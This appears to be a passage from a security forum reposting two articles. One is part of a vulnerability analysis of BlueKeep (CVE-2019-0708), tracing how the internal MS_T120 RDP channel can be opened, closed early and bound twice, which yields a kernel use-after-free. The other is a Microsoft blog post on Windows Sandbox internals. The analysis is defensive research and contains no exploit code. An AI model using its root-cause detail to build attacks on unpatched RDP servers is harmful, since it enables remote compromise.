breakpoint is hit Following the call stack downwards, we can see the transition from user to kernel mode at ntdll!NtCreateFile. Ntdll just provides a thunk for the kernel, so that’s not of interest. Below is the ICAAPI, which is the user mode counterpart of TermDD.sys. The call starts out in ICAAPI at IcaChannelOpen, so this is probably the user mode equivalent of IcaCreateChannel. Due to the fact IcaOpenChannel is a generic function used for opening all channels, we’ll go down another level to rdpwsx!MCSCreateDomain. The code for rdpwsx!MCSCreateDomain This function is really promising for a couple of reasons: Firstly, it calls IcaChannelOpen with the hard coded name “MS_T120”. Secondly, it creates an IoCompletionPort with the returned channel handle (Completion Ports are used for asynchronous I/O). The variable named “CompletionPort” is the completion port handle. By looking at xrefs to the handle, we can probably find the function which handles I/O to the port. All references to “CompletionPort” Well, MCSInitialize is probably a good place to start. Initialization code is always a good place to start. The code contained within MCSInitialize Ok, so a thread is created for the completion port, and the entrypoint is IoThreadFunc. Let’s look there. The completion port message handler GetQueuedCompletionStatus is used to retrieve data sent to a completion port (i.e. the channel). If data is successfully received, it’s passed to MCSPortData. To confirm my understanding, I wrote a basic RDP client with the capability of sending data on RDP channels. I opened the MS_T120 channel, using the method previously explained. Once opened, I set a breakpoint on MCSPortData; then, I sent the string “MalwareTech” to the channel. Breakpoint hit on MCSPortData once data is sent the the channel. So that confirms it, I can read/write to the MS_T120 channel. Now, let’s look at what MCSPortData does with the channel data… MCSPortData buffer handling code ReadFile tells us the data buffer starts at channel_ptr+116. Near the top of the function is a check performed on chanel_ptr+120 (offset 4 into the data buffer). If the dword is set to 2, then the function calls HandleDisconnectProviderIndication and MCSCloseChannel. Well, that’s interesting. The code looks like some kind of handler to deal with channel connects/disconnect events. After looking into what would normally trigger this function, I realized MS_T120 is an internal channel and not normally exposed externally. I don’t think we’re supposed to be here… Being a little curious, i sent the data required to trigger the call to MCSChannelClose. Surely prematurely closing an internal channel couldn’t lead to any issues, could it? Oh, no. We crashed the kernel! Whoops! Let’s take a look at the bugcheck to get a better idea of what happened. It seems that when my client disconnected, the system tried to close the MS_T120 channel, which I’d already closed (leading to a double free). Due to some mitigations added in Windows Vista, double-free vulnerabilities are often difficult to exploit. However, there is something better. Internals of the channel cleanup code run when the connection is broken Internally, the system creates the MS_T120 channel and binds it with ID 31. However, when it is bound using the vulnerable IcaBindVirtualChannels code, it is bound with another id. The difference in code pre and post patch Essentially, the MS_T120 channel gets bound twice (once internally, then once by us). Due to the fact the channel is bound under two different ids, we get two separate references to it. When one reference is used to close the channel, the reference is deleted, as is the channel; however, the other reference remains (known as a use-after-free). With the remaining reference, it is now possible to write kernel memory which no longer belongs to us. Sursa: https://www.malwaretech.com/2019/05/analysis-of-cve-2019-0708-bluekeep.html
      • 2
      • Upvote
      • Like
  25. Hari Pulapaka Microsoft ‎12-18-2018 04:18 PM Windows Sandbox Windows Sandbox is a new lightweight desktop environment tailored for safely running applications in isolation. How many times have you downloaded an executable file, but were afraid to run it? Have you ever been in a situation which required a clean installation of Windows, but didn’t want to set up a virtual machine? At Microsoft we regularly encounter these situations, so we developed Windows Sandbox: an isolated, temporary, desktop environment where you can run untrusted software without the fear of lasting impact to your PC. Any software installed in Windows Sandbox stays only in the sandbox and cannot affect your host. Once Windows Sandbox is closed, all the software with all its files and state are permanently deleted. Windows Sandbox has the following properties: Part of Windows – everything required for this feature ships with Windows 10 Pro and Enterprise. No need to download a VHD! Pristine – every time Windows Sandbox runs, it’s as clean as a brand-new installation of Windows Disposable – nothing persists on the device; everything is discarded after you close the application Secure – uses hardware-based virtualization for kernel isolation, which relies on the Microsoft’s hypervisor to run a separate kernel which isolates Windows Sandbox from the host Efficient – uses integrated kernel scheduler, smart memory management, and virtual GPU Prerequisites for using the feature Windows 10 Pro or Enterprise Insider build 18305 or later AMD64 architecture Virtualization capabilities enabled in BIOS At least 4GB of RAM (8GB recommended) At least 1 GB of free disk space (SSD recommended) At least 2 CPU cores (4 cores with hyperthreading recommended) Quick start Install Windows 10 Pro or Enterprise, Insider build 18305 or newer Enable virtualization: If you are using a physical machine, ensure virtualization capabilities are enabled in the BIOS. If you are using a virtual machine, enable nested virtualization with this PowerShell cmdlet: Set-VMProcessor -VMName <VMName> -ExposeVirtualizationExtensions $true Open Windows Features, and then select Windows Sandbox. Select OK to install Windows Sandbox. You might be asked to restart the computer. Using the Start menu, find Windows Sandbox, run it and allow the elevation Copy an executable file from the host Paste the executable file in the window of Windows Sandbox (on the Windows desktop) Run the executable in the Windows Sandbox; if it is an installer go ahead and install it Run the application and use it as you normally do When you’re done experimenting, you can simply close the Windows Sandbox application. All sandbox content will be discarded and permanently deleted Confirm that the host does not have any of the modifications that you made in Windows Sandbox. Windows Sandbox respects the host diagnostic data settings. All other privacy settings are set to their default values. Windows Sandbox internals Since this is the Windows Kernel Internals blog, let’s go under the hood. Windows Sandbox builds on the technologies used within Windows Containers. Windows containers were designed to run in the cloud. We took that technology, added integration with Windows 10, and built features that make it more suitable to run on devices and laptops without requiring the full power of Windows Server. Some of the key enhancements we have made include: Dynamically generated Image At its core Windows Sandbox is a lightweight virtual machine, so it needs an operating system image to boot from. One of the key enhancements we have made for Windows Sandbox is the ability to use a copy of the Windows 10 installed on your computer, instead of downloading a new VHD image as you would have to do with an ordinary virtual machine. We want to always present a clean environment, but the challenge is that some operating system files can change. Our solution is to construct what we refer to as “dynamic base image”: an operating system image that has clean copies of files that can change, but links to files that cannot change that are in the Windows image that already exists on the host. The majority of the files are links (immutable files) and that's why the small size (~100MB) for a full operating system. We call this instance the “base image” for Windows Sandbox, using Windows Container parlance. When Windows Sandbox is not installed, we keep the dynamic base image in a compressed package which is only 25MB. When installed the dynamic base package it occupies about 100MB disk space. Smart memory management Memory management is another area where we have integrated with the Windows Kernel. Microsoft’s hypervisor allows a single physical machine to be carved up into multiple virtual machines which share the same physical hardware. While that approach works well for traditional server workloads, it isn't as well suited to running devices with more limited resources. We designed Windows Sandbox in such a way that the host can reclaim memory from the Sandbox if needed. Additionally, since Windows Sandbox is basically running the same operating system image as the host we also allow Windows sandbox to use the same physical memory pages as the host for operating system binaries via a technology we refer to as “direct map”. In other words, the same executable pages of ntdll, are mapped into the sandbox as that on the host. We take care to ensure this done in a secure manner and no secrets are shared. Integrated kernel scheduler With ordinary virtual machines, Microsoft’s hypervisor controls the scheduling of the virtual processors running in the VMs. However, for Windows Sandbox we use a new technology called “integrated scheduler” which allows the host to decide when the sandbox runs. For Windows Sandbox we employ a unique scheduling policy that allows the virtual processors of the sandbox to be scheduled in the same way as threads would be scheduled for a process. High-priority tasks on the host can preempt less important work in the sandbox. The benefit of using the integrated scheduler is that the host manages Windows Sandbox as a process rather than a virtual machine which results in a much more responsive host, similar to Linux KVM. The whole goal here is to treat the Sandbox like an app but with the security guarantees of a Virtual Machine. Snapshot and clone As stated above, Windows Sandbox uses Microsoft’s hypervisor. We're essentially running another copy of Windows which needs to be booted and this can take some time. So rather than paying the full cost of booting the sandbox operating system every time we start Windows Sandbox, we use two other technologies; “snapshot” and “clone.” Snapshot allows us to boot the sandbox environment once and preserve the memory, CPU, and device state to disk. Then we can restore the sandbox environment from disk and put it in the memory rather than booting it, when we need a new instance of Windows Sandbox. This significantly improves the start time of Windows Sandbox. Graphics virtualization Hardware accelerated rendering is key to a smooth and responsive user experience, especially for graphics-intense or media-heavy use cases. However, virtual machines are isolated from their hosts and unable to access advanced devices like GPUs. The role of graphics virtualization technologies, therefore, is to bridge this gap and provide hardware acceleration in virtualized environments; e.g. Microsoft RemoteFX. More recently, Microsoft has worked with our graphics ecosystem partners to integrate modern graphics virtualization capabilities directly into DirectX and WDDM, the driver model used by display drivers on Windows. At a high level, this form of graphics virtualization works as follows: Apps running in a Hyper-V VM use graphics APIs as normal. Graphics components in the VM, which have been enlightened to support virtualization, coordinate across the VM boundary with the host to execute graphics workloads. The host allocates and schedules graphics resources among apps in the VM alongside the apps running natively. Conceptually they behave as one pool of graphics clients. This process is illustrated below: This enables the Windows Sandbox VM to benefit from hardware accelerated rendering, with Windows dynamically allocating graphics resources where they are needed across the host and guest. The result is improved performance and responsiveness for apps running in Windows Sandbox, as well as improved battery life for graphics-heavy use cases. To take advantage of these benefits, you’ll need a system with a compatible GPU and graphics drivers (WDDM 2.5 or newer). Incompatible systems will render apps in Windows Sandbox with Microsoft’s CPU-based rendering technology. Battery pass-through Windows Sandbox is also aware of the host’s battery state, which allows it to optimize power consumption. This is critical for a technology that will be used on laptops, where not wasting battery is important to the user. Filing bugs and suggestions As with any new technology, there may be bugs. Please file them so that we can continually improve this feature. File bugs and suggestions at Windows Sandbox's Feedback Hub (select Add new feedback), or follows these steps: Open the Feedback Hub Select Report a problem or Suggest a feature. Fill in the Summarize your feedback and Explain in more details boxes with a detailed description of the issue or suggestion. Select an appropriate category and subcategory by using the dropdown menus. There is a dedicated option in Feedback Hub to file "Windows Sandbox" bugs and feedback. It is located under "Security and Privacy" subcategory "Windows Sandbox". Select Next If necessary, you can collect traces for the issue as follows: Select the Recreate my problem tile, then select Start capture, reproduce the issue, and then select Stop capture. Attach any relevant screenshots or files for the problem. Submit. Conclusion We look forward to you using this feature and receiving your feedback! Cheers, Hari Pulapaka, Margarit Chenchev, Erick Smith, & Paul Bozzay (Windows Sandbox team) Sursa: https://techcommunity.microsoft.com/t5/Windows-Kernel-Internals/Windows-Sandbox/ba-p/301849
×
×
  • Create New...